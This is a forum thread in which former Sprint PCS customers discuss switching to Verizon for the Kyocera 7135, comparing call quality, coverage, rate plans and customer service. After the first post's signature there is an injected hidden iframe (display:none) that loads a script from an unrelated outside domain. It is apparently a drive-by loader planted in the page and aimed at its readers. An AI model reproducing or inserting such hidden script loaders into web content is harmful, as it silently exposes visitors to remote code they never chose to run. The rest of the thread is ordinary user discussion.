+ Reply to Thread

SprintPCS to Verizon Converts

Hey everybody.

I'd like to hear from former SprintPCS users that have migrated over to Verizon with the Kyo 7135.

How is the call quality on Verizon? Just as good as on Sprint?

I'm on the fence to grab a 7135, but I am currently on SprintPCS with my 6035. I like the Kyocera build quality (never had a problem with my unit out of the box - althugh it was the 2-3 build type). But, I do like the SprintPCS rate plans and have never had a problem with service within 4 years.

Any input would help.

Thanks,
    Dave Lindberg<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just called yesterday and cancelled my service with SprintPCS. I've had my 7135 for 3 days and have had MUCH better coverage than I did with my i300 on Sprint. I am in a fairly rural area, so my better coverage story probably affects only me. I live in Southern Illinois and Verizon coverage is pretty recent, so I'd have to say we probably have some really new equipment serving our area. In fact, our Express Network just went live on April 7th, this was the final nail in the coffin for my i300.

I was very specific with the Sprint rep who I talked about why I was leaving and why the i500 was not good enough. It will make little difference at this point, I just hope the i500 decision bites them in the butt.

I was using a samsung i300 and decided to switch to verizon because i liked the kyocera 7135 over the samsung i330.

I have found the sound quality is not as good as sprint was for my particular area (eastern washington). Also, the phone always says I am roaming because I live in a different area code than where the phone is assigned to, but they assured me I would not be charged for roaming as long as i stay in washington/idaho/oregan.

The Sprint service plans are cheaper which was nice, but customer service on the phone with verizon is unbeatable. They speak clear english and are very thorough. Overall are am satisfied with my switch to verizon.

I was a 6035 user with Sprint for the last two years. I loved the phone and Sprint always worked for me. I would have gladly stayed with Sprint had they decided to support the 7135.

I'm on day three with the 7135 and Verizon. I've had no problems with Verizon, but I live the the SF Bay Area where both carriers are both strong. However, I've had two soft resets with my 7135 so far. It does seem less stable than the 6035. I've got another 12 days to evaluate the phone and service. So far, I'm cautiously optomistic.

I switched from a Sprint 6035 to a Verizon 7135. I wouldn't have left Sprint but for the 7135. I can't say that I've noticed much of a difference between the services, except that I get a crappier Verizon signal in my office than Sprint (I have line of sight to a cell tower, which I assume from the better quality is a Sprint tower). I think signal quality on Verizon may be marginally less clear, but I'm not sure on that one. Certainly not enough to make it a dealbreaker that would keep me from getting a much better phone (and one which Sprint will not have a counterpart to for a while).

Also, because I'm not paying for anything more than QNC data access, my plan on Verizon costs the same as on Sprint.
    ---------------
    The same thing we do every night, Pinky...

I switched from a Treo 300 on Sprint to the 7135 on Verizon. I haven't noticed any difference in coverage areas. I thought Sprint's call quality/clarity was a little better than Verizon's but not by that much. I do miss my Sprint retention plan and Sprint's Vision network, which blows Express Network out of the water in terms of both value and connection speeds. But all in all, I am fairly happy with my decision. The 7135 is a great device and definitely makes up for what I lost by leaving Sprint.

I was with Sprint for 4 years and had a sweet plan (650/3000 for $35), but I have no regrets about having left that behind for the Kyocera 7135 and Verizon. The Verizon plan is more expensive (500/2000 for $50), but the better coverage (very impressive!) and consistently excellent customer service have made that much more bearable. That, in addition to the 7135, makes it a no brainer!

Originally posted by Marty
    I switched from a Treo 300 on Sprint to the 7135 on Verizon. I haven't noticed any difference in coverage areas. I thought Sprint's call quality/clarity was a little better than Verizon's but not by that much. I do miss my Sprint retention plan and Sprint's Vision network, which blows Express Network out of the water in terms of both value and connection speeds. But all in all, I am fairly happy with my decision. The 7135 is a great device and definitely makes up for what I lost by leaving Sprint.
    Same here... I miss my retention plan, but having the 7135 makes it all worthwhile
    Please visit my picture site: Robert-O-Rama :)

Well, I'll represent the other side of the fence. I switched to Verizon for the 7135 also. I travel between Dallas and Denver quite a bit (live in Denver, folks and fiance in Dallas), so I wanted a Dallas phone number. This is the same setup I've had with Sprint since moving here with no problems. With Verizon, however it created endless problems. First of all, when I got the phone, the roaming light was permanently on, and it should have never been on. After running around all over God's green earth trying to get the PRL updated (we don't have the cable, we don't have the software for that phone, you'll have to do in the southern region), I finally got that fixed. I'm sure I'll have a lot of fun trying to get my half-month bill corrected. Next, the signal was weaker than Sprint's in the 2 places that matter most to me, my office and my house. Yet, I was still willing to put up with all this because the phone is just so damn cool. But the signal was so weak that it was dropping calls or I was missing calls entirely. But I thought, it's OK. I'll just keep my eye on the voicemail indicator, and if I miss a call, I'll call them back. However, the straw that broke the camel's back is that voicemail indicator didn't work when I was out of my home area. Game over. I finally got tired of asking myself, "Why am I putting up with this?" The phone is cool, but nothing is worth this much aggravation. I never actually got back to Dallas while I was still in possession of the phone, so I don't know if it would have worked down there or not. The bottom line is, the phone, or more accurately Verizon's service, was unusable for me. Verizon's phone support was always very prompt and polite. However, it was seldom useful. I sent my phone back over 2 weeks ago. It was received over 10 days ago. The price still hasn't been credited to my card. After several calls to Verizon, I was informed it will take 4-6 weeks! Since I get a different answer everytime I call, I'll keep on trying. I'm glad there are a lot of folks out there who are having a great time with their 7135's. As for me, I'm stuck with Sprint. I had been going month to month for the last 6 months while I waited out delay after delay for the 7135. I will not be buying the I500 either. Someday, Sprint will see the light and release something that actually has all the features I'm waiting for...yeah right!
    The 7135 is a marathon, not a Sprint

Are you all paying 79.99 each month for unlimited data or are you paying per message and per minute and per et cetera?

With your new toy aren't you likely to go over your minutes if you don't take the unlimited plan?

Are you really getting your 80 bucks worth each month when you compare to the Treo?

I'm a former I-300 / 6035 Sprint customer who made the jump. Absolutely no regrets - VZW service has been great (like having a dedicated data support number unlike SPCS forcing you through the call queues...). I had stopped by a local mall SPCS store before switching and found I was #22 in line to get help. The customers in the store made the Star Wars "bar scene" clients seem normal by comparison!

i-500 was rumored to be out today but is still MIA.

SPCS business connection personal edition (ie checking corporate email) was their best feature and a near show-stopper. I ended up with Laplink's PC Everywhere instead ($29/year for service if you have an older version of Laplink). Works great - unbelievably faster - but limited offline use. It works for my purposes.

Originally posted by wisb
    Are you all paying 79.99 each month for unlimited data or are you paying per message and per minute and per et cetera?

With your new toy aren't you likely to go over your minutes if you don't take the unlimited plan?

Are you really getting your 80 bucks worth each month when you compare to the Treo?
    It's $45 to have unlimited EN with the 7135. My monthly bill will now be about $105 with Verizon, where it was about $75 with Sprint... but the 7135 is worth $30 more per month to use than my Treo was (I had the Treo with unlimited Vision for 5 months, with the best retention plan in the universe... but still opted to get the 7135 with Verizon)

I switch from Sprint (model 6035) to Verizon (7135). I call from metro Phoenix and am told my voice is much clearer -- so either the phone or the service is better. Frankly, my experiences with Verizon have been better coverage and much better coverage area (I had Verizon until I swithed to Sprint just to get the 6035 dirt cheap). For a modest increase in price, I now get 1200 unlimited minutes (excluding nights, weekends, and mobile to mobile). I made a very good decision for me.

Newly converted!

Placed my order for the Precious today!

Was with Sprint since they offered the 1st model Samsung SCH-8500. Had a Handspring Visor Deluxe (one of the 1st ones shipped). Also had a RCA Lyra MP3 player.

All that technology lasted right up until a couple of months ago, and I've been limping along awaiting the 7135's release. As of Tuesday or Wednesday of next week, the wait will be over.

Hard to believe Sprint passed on the chance to keep customers like me who paid them well over $120 a month for all those years...

Thanks to all of you out there in SmartphoneSource who posted here and gave me insight while I awaited my chance to make the move to the 7135.
    "Those who cast the votes decide nothing, those who count the votes decide everything."

Re: Newly converted!

Originally posted by Felt-Dawg
    Placed my order for the Precious today!
    Sweet! Let us know how you like it when you get it